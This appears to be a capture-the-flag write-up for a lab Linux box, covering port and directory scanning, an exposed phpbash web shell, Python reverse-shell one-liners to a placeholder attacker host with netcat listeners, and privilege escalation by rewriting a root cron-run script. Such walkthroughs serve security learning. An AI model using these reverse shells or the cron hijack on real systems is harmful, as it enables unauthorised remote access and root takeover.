Info
- IP:
10.10.10.68 - OS: Linux
- Supposed to be Easy
Recon
~ nmap -T5 -vvv 10.10.10.68
Completed Connect Scan at 02:25, 30.51s elapsed (1000 total ports)
Nmap scan report for 10.10.10.68
Host is up, received syn-ack (0.25s latency).
Scanned at 2024-01-23 02:25:14 EST for 31s
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON
80/tcp open http syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 43.83 seconds~ gobuster dir -u 10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 500 2>/dev/null
=============================================================== [0/354]
[+] Url: http://10.10.10.68
[+] Method: GET
[+] Threads: 500
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/uploads (Status: 301) [Size: 312] [--> http://10.10.10.68/uploads/]
/images (Status: 301) [Size: 311] [--> http://10.10.10.68/images/]
/css (Status: 301) [Size: 308] [--> http://10.10.10.68/css/]
/dev (Status: 301) [Size: 308] [--> http://10.10.10.68/dev/]
/js (Status: 301) [Size: 307] [--> http://10.10.10.68/js/]
/fonts (Status: 301) [Size: 310] [--> http://10.10.10.68/fonts/]
===============================================================
Finished
===============================================================
That /dev looks fun. Let’s go in there.
And we got a bash shell by accessing phpbash.php.
Next thing I check for python and get myself a full interactive revershell.
# on attacking machine
~ nc -lnvp 9000
# on phpbash.php
~ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.2.3.4",9000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# (obviously replace 1.2.3.4 and port with yours)
After we got a shell as www, just type in sudo -l to see what could we run as sudo
~ sudo -l
[...]
(scriptmanager : scriptmanager) NOPASSWD: ALL
~ sudo -u scriptmanager bash
scriptmanager@bashed:~$ Go ahead and scout a little around using whatever tools you used.
Info
I dug around a bit on my first interact and already know that there’s a folder owns by
scriptmanagerin root directory.
There should be two files in there. One is a python script, another is a text file own by root and keeps changing every minute or so(?). So it’s kinda obvious there’s a cronjob running.
Examining the test.py confirms the suspicious. A root’s cronjob runs test.py every minute and write to test.txt. We could modify it and use it to get a root shell.
I used the same way I get the initial shell. Just open another nc and wait for test.py to runs
Modify test.py to something similar to this
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("1.2.3.4",9001))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])And open another netcat instance with port 9001 (or whatever the hell you want)
~ nc -lnvp 9001Then wait for a minute or two. Then there you have it.